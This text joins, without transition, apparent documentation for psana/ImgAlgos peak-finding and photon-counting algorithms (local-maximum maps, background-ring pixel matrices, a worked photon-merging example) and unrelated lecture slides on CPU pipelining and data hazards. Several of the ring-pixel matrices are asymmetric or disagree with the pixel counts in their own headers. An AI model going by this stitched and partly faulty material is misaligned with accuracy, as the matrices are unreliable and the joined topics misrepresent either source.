- makes a map of pixels with local maximums of requested rank for data ndarray and mask, pixel code in the map may have bits 0/1/2/4 standing for not-a-maximum / maximum-in-row / maximum-in-column / maximum-in-rectangular-region of radius=rank.
- for each pixel with local maximal intensity in the region defined by the rank radius counts a number of pixels with intensity above zero, total positive intensity, center of gravity coordinates and rms,
- using parameters \( \text{r}_0 \) (ex. 5.0) and \( \text{dr} \) (ex. 0.05), evaluates the background level, rms of noise, and S/N for the pixel with maximal intensity,
- makes a list of peaks which pass the selector with parameters set in `set_peak_selection_pars`, for example
```python
alg.set_peak_selection_pars(npix_min=5, npix_max=500, amax_thr=0, atot_thr=1000, son_min=6)
```
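The rank-based local-maximum condition can be sketched in numpy. This sketch keeps only unique window maxima and ignores the mask and the row/column bit codes of the real map:

```python
import numpy as np

def local_maxima(data, rank):
    """Pixels that are the unique maximum of the (2*rank+1)x(2*rank+1)
    window around them (edge windows are clipped to the array)."""
    rows, cols = data.shape
    maxima = []
    for r in range(rows):
        for c in range(cols):
            win = data[max(0, r - rank):r + rank + 1,
                       max(0, c - rank):c + rank + 1]
            m = win.max()
            if data[r, c] == m and np.count_nonzero(win == m) == 1:
                maxima.append((r, c))
    return maxima

img = np.zeros((7, 7))
img[2, 2] = 9.0
img[2, 4] = 5.0
```

With rank=1 both bright pixels are local maxima; with rank=2 their windows overlap and only the brighter one survives.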
Demonstration for local maximum map
Test for 100x100 image with random normal distribution of intensities
Example of the map of local maximums found for rank from 1 to 5:
Color coding of pixels:
The table below shows the rank, the associated 2-d region size, the fraction of pixels recognized as local maxima for that rank, and the time consumed by this algorithm.
<table>
<thead>
<tr>
<th>rank</th>
<th>2-d region</th>
<th>fraction</th>
<th>time, ms</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>3x3</td>
<td>0.1062</td>
<td>5.4</td>
</tr>
<tr>
<td>2</td>
<td>5x5</td>
<td>0.0372</td>
<td>5.2</td>
</tr>
<tr>
<td>3</td>
<td>7x7</td>
<td>0.0179</td>
<td>5.1</td>
</tr>
<tr>
<td>4</td>
<td>9x9</td>
<td>0.0104</td>
<td>5.2</td>
</tr>
<tr>
<td>5</td>
<td>11x11</td>
<td>0.0066</td>
<td>5.2</td>
</tr>
</tbody>
</table>
Evaluation of the background level, rms, and S/N ratio
When a peak is found, its background level, noise rms, and signal-over-noise ratio (S/N) can be estimated. All these values are evaluated using pixels surrounding the peak at some distance. The same algorithm is used for all peak finders. The surrounding pixels are defined by a ring with internal radius \( r_0 \) and ring width \( d_r \) (both in pixels). The number of surrounding pixels depends on the \( r_0 \) and \( d_r \) parameters as shown in the matrices below. We use the notation
- `+` - central pixel with maximal intensity,
- `1` - pixels counted in the calculation of the averaged background level and noise rms,
- `0` - pixels not counted.
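Assuming the ring includes radii in the closed interval [r0, r0+dr] (an assumption inferred from the pixel counts quoted in the matrices below), those counts can be reproduced with a short numpy sketch:

```python
import numpy as np

def ring_pixel_count(r0, dr):
    """Count lattice pixels whose distance from the central pixel lies in
    [r0, r0 + dr]; both ends are assumed inclusive, which matches the
    pixel counts quoted in the ring matrices."""
    n = int(np.ceil(r0 + dr))
    y, x = np.mgrid[-n:n + 1, -n:n + 1]
    r = np.hypot(y, x)
    return int(np.count_nonzero((r >= r0) & (r <= r0 + dr)))
```

For example, r0=3 with dr=0.1, 0.5, 1 gives 4, 12, and 24 pixels, as quoted in the headers below.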
Matrices of pixels for \( r_0=3 \) and 4 and different \( d_r \) values
<table>
<thead>
<tr>
<th>$r_0=3$, $dr=0.1$ (4 pixels)</th>
<th>$r_0=3$, $dr=0.5$ (12 pixels)</th>
<th>$r_0=3$, $dr=1$ (24 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 0 0 0 0</td>
<td>0 0 1 1 1 1 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 + 0 0 1 0 0</td>
<td>0 1 0 0 + 0 0 1 0 0</td>
<td>1 1 0 0 + 0 0 1 1 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0</td>
<td>0 1 0 0 0 0 0 0 1 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0</td>
</tr>
<tr>
<td>0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 0 0 0 0</td>
<td>0 0 1 1 1 1 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 1 0 0 0 0 0</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>$r_0=4$, $dr=0.2$ (12 pixels)</th>
<th>$r_0=4$, $dr=0.3$ (16 pixels)</th>
<th>$r_0=4$, $dr=0.5$ (24 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 0 0 0 0 0 1 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 0 + 0 0 0 1 0 0</td>
<td>0 1 0 0 0 + 0 0 0 1 0 0</td>
<td>0 1 0 0 0 + 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 1 0 0 0 0 0 0 1 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0 0 0</td>
<td>0 1 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 1 0 0 0 0 0 0 0 1 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 0 1 1 1 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
</tbody>
</table>
**Matrices of pixels for r0=5 and 6 and different dr values**
<table>
<thead>
<tr>
<th>r0=5, dr=0.05 (12 pixels)</th>
<th>r0=5, dr=0.5 (28 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 1 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
<td>0 0 0 1 0 0 0 0 0 1 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 1 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>r0=6, dr=0.2 (12 pixels)</th>
<th>r0=6, dr=0.5 (28 pixels)</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 1 1 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 1 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 1 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 1 0 0 0 0 0 0 0 1 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 1 1 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
<tr>
<td>0 0 0 0 0 0 0 0 0 0 0 0 0 0 0</td>
<td>0 0 0 1 1 1 1 1 0 0 0 0 0 0 0</td>
</tr>
</tbody>
</table>
Photon counting in pixel detectors is complicated by photons split between neighboring pixels. In some cases, the energy deposited by a photon is split between two or (sometimes) more pixels. The photon counting algorithm described here is designed to account for this effect and return an unassembled array with the correct number of photons per pixel. The pythonic API for this algorithm is as follows:
```python
# Import
import psana
# Initialize a detector object
det = psana.Detector('myAreaDetectorName')
# Merges photons split among pixels and returns n-d array with integer number of photons per pixel.
nphotons_nda = det.photons(evt, nda_calib=None, mask=None, adu_per_photon=None)
```
The `det.photons()` function divides the pixel intensities (ADUs) by `adu_per_photon`, resulting in a fractional number of photons for each pixel. This function is a wrapper around the `photons()` method in PyAlgos:
```python
# Import
from ImgAlgos.PyAlgos import photons
# Merges photons split among pixels and returns n-d array with integer number of photons per pixel.
nphotons_nda = photons(fphotons, adu_per_photon=30)
```
Sphinx doc
Method `photons` receives a (float) n-d numpy array `fphotons`, representing image intensity in terms of a (float) fractional number of photons, and an associated mask of bad pixels. Both arrays should have the same shape. The two lowest dimensions represent pixel rows and columns in 2-d pixel matrix arrays. The algorithm works with the good pixels defined by the mask array (1/0 = good/bad pixel). The `fphotons` array is split into two arrays of the same shape: an integer array containing the whole number of photons and a float array containing the leftover fractional number of photons. Assuming the photons are only split between two adjacent pixels, we round up adjacent pixels if they sum to about 0.9 photons or more. The algorithm is best explained using an example:
Let's say we measured the following ADUs on our detector. "adu_per_photon" is user-defined, but for this example let's set it to 1:
<table>
<thead>
<tr>
<th>ADUs (adu_per_photon=1):</th>
<th>Whole photons</th>
<th>Fractional photons</th>
</tr>
</thead>
<tbody>
<tr>
<td>0.0 3.5 0.1 0.2</td>
<td>0 3 0 0</td>
<td>0.0 0.5 0.1 0.2</td>
</tr>
<tr>
<td>0.2 0.4 0.0 1.2</td>
<td>0 0 0 1</td>
<td>0.2 0.4 0.0 0.2</td>
</tr>
<tr>
<td>0.1 4.7 3.4 0.0</td>
<td>0 4 3 0</td>
<td>0.1 0.7 0.4 0.0</td>
</tr>
<tr>
<td>0.5 0.4 0.4 0.1</td>
<td>0 0 0 0</td>
<td>0.5 0.4 0.4 0.1</td>
</tr>
</tbody>
</table>
We expect the converted photon counts to be:
<table>
<thead>
<tr>
<th>Photons:</th>
</tr>
</thead>
<tbody>
<tr>
<td>0 4 0 0</td>
</tr>
<tr>
<td>0 0 0 1</td>
</tr>
<tr>
<td>0 5 3 0</td>
</tr>
<tr>
<td>1 0 0 0</td>
</tr>
</tbody>
</table>
To see how we get from ADUs to Photons, we split the ADUs into whole photons and fractional photons.
Assuming the photons are only split between two adjacent pixels, we search for a pixel that has at least 0.5 photons and an adjacent pixel such that the pair sums to about 0.9 photons or more. In cases where a pixel has multiple adjacent pixels that qualify, we take the largest adjacent pixel. If such an adjacent pair of pixels is found, the two pixel values are merged into the pixel with the larger value (see the "After merging adjacent pixels" example below).
The merged adjacent pixels are then rounded to whole photons. (See "Rounded whole photons" example below).
Fractional photons
0.0 0.5 0.1 0.2
0.2 0.4 0.0 0.2
0.1 0.7 0.4 0.0
0.5 0.4 0.4 0.1
After merging adjacent pixels:
0.0 0.9 0.1 0.2
0.2 0.0 0.0 0.2
0.1 1.1 0.0 0.0
0.9 0.0 0.4 0.1
Rounded whole photons:
0 1 0 0
0 0 0 0
0 1 0 0
1 0 0 0
Photons is then the sum of "Whole photons" and "Rounded whole photons":
Photons = Whole photons + Rounded whole photons:
0 4 0 0 = 0 3 0 0 + 0 1 0 0
0 0 0 1 = 0 0 0 1 + 0 0 0 0
0 5 3 0 = 0 4 3 0 + 0 1 0 0
1 0 0 0 = 0 0 0 0 + 1 0 0 0
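A Python sketch of this merging procedure. The scan order, the neighbor order, the tie-breaking rule, and the exact threshold comparison are not specified above, so they are assumptions here; with these assumptions the sketch reproduces the worked example:

```python
import numpy as np

def merge_split_photons(frac):
    """Merge fractional photons split between adjacent pixels (4-neighbors).
    A pixel holding at least 0.5 of a photon is paired with its largest
    neighbor; if the pair sums to ~0.9 photons or more, the sum is rounded
    and credited to the larger of the two pixels."""
    frac = frac.copy()
    rounded = np.zeros(frac.shape, dtype=int)
    rows, cols = frac.shape
    neighbors = [(-1, 0), (0, -1), (0, 1), (1, 0)]  # up, left, right, down (assumed order)
    for r in range(rows):
        for c in range(cols):
            if frac[r, c] < 0.5:
                continue
            best = None
            for dr, dc in neighbors:
                rr, cc = r + dr, c + dc
                if 0 <= rr < rows and 0 <= cc < cols:
                    if best is None or frac[rr, cc] > frac[best]:
                        best = (rr, cc)
            if best is None:
                continue
            s = frac[r, c] + frac[best]
            if s >= 0.9 - 1e-9:  # the exact threshold comparison is an assumption
                target = (r, c) if frac[r, c] >= frac[best] else best
                rounded[target] = int(s + 0.5)
                frac[r, c] = frac[best] = 0.0
    return rounded

def count_photons(adus, adu_per_photon=1.0):
    f = np.asarray(adus, dtype=float) / adu_per_photon
    whole = np.floor(f).astype(int)
    frac = np.round(f - whole, 6)  # strip float noise so ties break deterministically
    return whole + merge_split_photons(frac)
```

Running `count_photons` on the ADU matrix from the example above yields the expected "Photons" matrix.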
References
- ImgAlgos.PyAlgos - code documentation
- psalgos - new peak-finder and other algorithms code documentation
- Peak Finding - short announcement about peak finders
- Hit and Peak Finders - examples in Chris' tutorial
- GUI for tuning peak finding - Chun's page in development
- Auto-generated documentation - references to code-based documentation for a few other useful packages
- pyimgalgos.PeakStore - class helping to save peak parameter records in the text file
- pyimgalgos.TDFileContainer - class helping to retrieve peak parameter records from the text file
- Test of Peak Finders - example of exploitation of peak finders
- Test of Peak Finders - V2 - example of exploitation of peak finders after revision 1 (uniformization)
- photons - sphinx doc
- Peak Finding Module - (deprecated) psana module, its demonstration examples and results
- Psana Module Catalog - (deprecated) peak finding psana modules
- Psana Module Examples - (deprecated) peak finding examples in psana modules
CPU Performance Equation
- Execution Time = seconds/program
\[
\frac{\text{instructions}}{\text{program}} \times \frac{\text{cycles}}{\text{instruction}} \times \frac{\text{seconds}}{\text{cycle}}
\]
- Program
- Architecture (ISA)
- Compiler
- Compiler (Scheduling)
- Organization (uArch)
- Microarchitects
- Technology
- Physical Design
- Circuit Designers
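The three factors multiply out directly; a tiny illustration with made-up numbers:

```python
def execution_time(instructions, cpi, clock_hz):
    """seconds/program = instructions/program x cycles/instruction x seconds/cycle"""
    return instructions * cpi / clock_hz

# hypothetical workload: 1e9 dynamic instructions, CPI of 1.25, 2 GHz clock
t_seconds = execution_time(1e9, 1.25, 2e9)
```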
Implementation Review
• First, let’s think about how different instructions get executed
Instruction Fetch
- Send the Program Counter (PC) to memory
- Fetch the current instruction from memory
- IR <= Mem[PC]
- Update the PC to the next sequential
- PC <= PC + 4 (4-bytes per instruction)
- Optimizations
- Instruction Caches, Instruction Prefetch
- Performance Affected by
- Code density, Instruction size variability (CISC/RISC)
Abstract Implementation
Instruction Decode/Reg Fetch
• Decide what type of instruction we have
• ALU, Branch, Memory
• Decode Opcode
• Get operands from Reg File
• A <= Regs[IR_{25..21}]; B <= Regs[IR_{20..16}];
• Imm <= SignExtend(IR_{15..0})
• Performance Affected by
• Regularity in instruction format, instruction length
Calculate Effective Address:
- Calculate Memory address for data
- $ALU_{output} \leq A + \text{Imm}$
- \text{LW R10, 10(R3)}
<table>
<thead>
<tr>
<th>Opcode</th>
<th>Rs</th>
<th>Rd</th>
<th>Immediate</th>
</tr>
</thead>
</table>
Calculate Effective Address:
- Calculate target for branch/jump operation
- **BEQZ, BNEZ, J**
- \( ALU_{output} \leq NPC + \text{Imm}; \text{cond} \leq A \text{ op } 0 \)
- “op” is a check against 0, equal, not-equal, etc.
- J is an unconditional jump
- \( ALU_{output} \leq A \)
Execution: ALU Ops
• Perform the computation
• Register-Register
• $\text{ALU}_{\text{output}} \leq A \text{ op } B$
• Register-Immediate
• $\text{ALU}_{\text{output}} \leq A \text{ op } \text{Imm}$
• No ops need to do effective address calc *and* perform an operation on data
• Why?
Memory Access
- Take effective address, perform Load or Store
- Load
- LMD \( \leq \text{Mem}[\text{ALU}_{\text{output}}] \)
- Store
- \( \text{Mem}[\text{ALU}_{\text{output}}] \leq B \)
Mem Phase on Branches
- Set PC to the calculated effective address
- BEQZ, BNEZ
- If (cond) PC <= ALU_{output} else PC <= NPC
Write-Back
- Send results back to register file
- Register-register ALU instructions
- $\text{Regs}[\text{IR}_{15..11}] <= \text{ALU}_{\text{output}}$
- Register-Immediate ALU instruction
- $\text{Regs}[\text{IR}_{20..16}] <= \text{ALU}_{\text{output}}$
- Load Instruction
- $\text{Regs}[\text{IR}_{20..16}] <= \text{LMD}$
- Why does this have to be a separate step?
What is Pipelining?
• Implementation where multiple instructions are simultaneously overlapped in execution
• Instruction processing has N different stages
• Overlap different instructions working on different stages
• Pipelining is not new
• Ford’s Model-T assembly line
• Laundry – Washer/Dryer
• IBM Stretch [1962]
• Since the ’70s nearly all computers have been pipelined
Pipelining Advantages
- **Unpipelined**
- **Pipelined**
- Latency
- $1/\text{throughput}$
Representation of Pipelines
Time (in clock cycles) →
<table>
<thead>
<tr>
<th>Program execution order</th>
<th>CC 1</th>
<th>CC 2</th>
<th>CC 3</th>
<th>CC 4</th>
<th>CC 5</th>
<th>CC 6</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R10, 20(R1)</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>sub R11, R2, R3</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
Pipeline Hazards
- **Hazards**
- Situations that prevent the next instruction from executing in its designated clock cycle
- **Structural Hazards**
- When two different instructions want to use the same hardware resource in the same cycle (resource conflict)
- **Data Hazards**
- When an instruction depends on the result of a previous instruction, in a way exposed by the overlapping of instructions in the pipeline
- **Control Hazards**
- Pipelining of PC-modifying instructions (branch, jump, etc)
How to resolve hazards?
- Simple Solution: Stall the pipeline
- Stops some instructions from executing
- Make them wait for older instructions to complete
- Simple implementation to “freeze” (de-assert write-enable signals on pipeline latches)
- Inserts a “bubble” into the pipe
- Must propagate upstream as well! Why?
### Structural Hazards
- **Two cases when this can occur**
- Resource used more than once in a cycle (Memory, ALU)
- Resource is not fully pipelined (FP Unit)
- **Imagine that our pipeline shares I- and D-memory**
<table>
<thead>
<tr>
<th>Instruction</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
<th>9</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R10, 10(R1)</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>sub R11, R2, R3</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>add R12, R4, R5</td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>add R13, R6, R7</td>
<td></td>
<td></td>
<td></td>
<td>stall</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
Structural Hazards
- **Stall**
- Low Cost, Simple (+)
- Increases CPI (-)
- Try to use for rare events in high-performance CPUs
- **Duplicate Resources**
- Decreases CPI (+)
- Increases cost (area), possibly cycle time (-)
- Use for cheap resources, frequent cases
- Separate I-, D-caches, Separate ALU/PC adders, Reg File Ports
Structural Hazards
• Pipeline Resources
• High performance (+)
• Control is simpler than duplication (+)
• Tough to pipeline some things (RAMs) (-)
• Use when frequency makes it worthwhile
• Ex. Fully pipelined FP add/multiplies critical for scientific
• Good news
• Structural hazards don’t occur as long as each instruction uses a resource
– At most once
– Always in the same pipeline stage
– For one cycle
• RISC ISAs are designed with this in mind, reduces structural hazards
Pipeline Stalls
• What could the performance impact of unified instruction/data memory be?
Loads ~15% of instructions, Stores ~10%
Prob (Ifetch + Dfetch) = .25
\[ \text{CPI}_{\text{Real}} = \text{CPI}_{\text{Ideal}} + \text{CPI}_{\text{Stall}} = 1.0 + 0.25 = 1.25 \]
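The arithmetic above can be encoded directly; a trivial sketch of CPI_real = CPI_ideal + (stall frequency x stall cycles):

```python
def cpi_real(cpi_ideal, hazard_freq, stall_cycles):
    """CPI_real = CPI_ideal + CPI_stall."""
    return cpi_ideal + hazard_freq * stall_cycles

# unified memory: 25% of instructions also need a data fetch, one stall cycle each
cpi = cpi_real(1.0, 0.25, 1)
```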
Data Hazards
- Two operands from different instructions use the same storage location
- Must appear as if instructions are executed to completion one at a time
- Three types of Data Hazards
- Read-After-Write (RAW)
- True data-dependence (Most important)
- Write-After-Read (WAR)
- Write-After-Write (WAW)
### RAW Example
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Add R3, R2, R1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>Add R7, R3, R5</td>
<td></td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
- First Add writes to R3 in cycle 5
- Second Add reads R3 in cycle 3
- Third Add reads R3 in cycle 4
- We would compute the wrong answer because R3 holds the “old” value
Solutions to RAW Hazards
• As usual, we have a couple of choices
• Stall whenever we have a RAW
• Huge performance penalty, dependencies are common!
• Use Bypass/Forwarding to minimize the problem
• Data is ready by end of EXE (Add) or MEM (Load)
• Basic idea:
– Add comparator for each combination of destination and source registers that can have RAW hazards (How many?)
– Add muxes to datapath to select proper value instead of regfile
• Only stall when absolutely necessary
Solutions to RAW Hazards:
• Two part problem: Detect the RAW, forward/stall the pipe
• Need to keep register ID’s along with pipestages
• Use comparators to check for hazards
• Operand 2 bypass for ADD R1, R2, R3:
If (R3 == RD(MEM)) use ALUOUT(MEM)
else if (R3 == RD(WB)) use ALUOUT(WB)
else use R3 from Register File
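That priority logic (the newest value wins: EX/MEM over MEM/WB over the register file) can be sketched in Python; the latch field names are invented for illustration:

```python
def bypass_operand(src, regfile, ex_mem=None, mem_wb=None):
    """Select an operand value with bypass priority: the newest producer
    wins (EX/MEM latch over MEM/WB latch over the register file)."""
    # Forward from the EX/MEM latch if it is writing our source register
    if ex_mem is not None and ex_mem["rd"] == src:
        return ex_mem["alu_out"]
    # Otherwise forward from the MEM/WB latch
    if mem_wb is not None and mem_wb["rd"] == src:
        return mem_wb["alu_out"]
    # No hazard: read the register file
    return regfile[src]
```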
### Forwarding, Bypassing
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>Add R3, R2, R1</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>Add R7, R3, R5</td>
<td></td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
- **Code is now “stall-free”**
- **Are there any cases where we must stall?**
### Load Use Hazards
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R3, 10(R1)</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td></td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
</tbody>
</table>
- Unfortunately, we can’t forward “backward in time”
<table>
<thead>
<tr>
<th>Cycle</th>
<th>1</th>
<th>2</th>
<th>3</th>
<th>4</th>
<th>5</th>
<th>6</th>
<th>7</th>
<th>8</th>
</tr>
</thead>
<tbody>
<tr>
<td>lw R3, 10(R1)</td>
<td>IF</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Add R4, R3, R5</td>
<td></td>
<td>IF</td>
<td>ID</td>
<td>stall</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
<td></td>
</tr>
<tr>
<td>Add R6, R3, R5</td>
<td></td>
<td></td>
<td>IF</td>
<td>stall</td>
<td>ID</td>
<td>EX</td>
<td>MEM</td>
<td>WB</td>
</tr>
</tbody>
</table>
Load Use Hazards
- Can the compiler help out?
- Scheduling to avoid load followed by immediate use
- “Delayed Loads”
- Define the pipeline slot after a load to be a “delay slot”
- NO interlock hardware; the machine assumes correct compiler scheduling
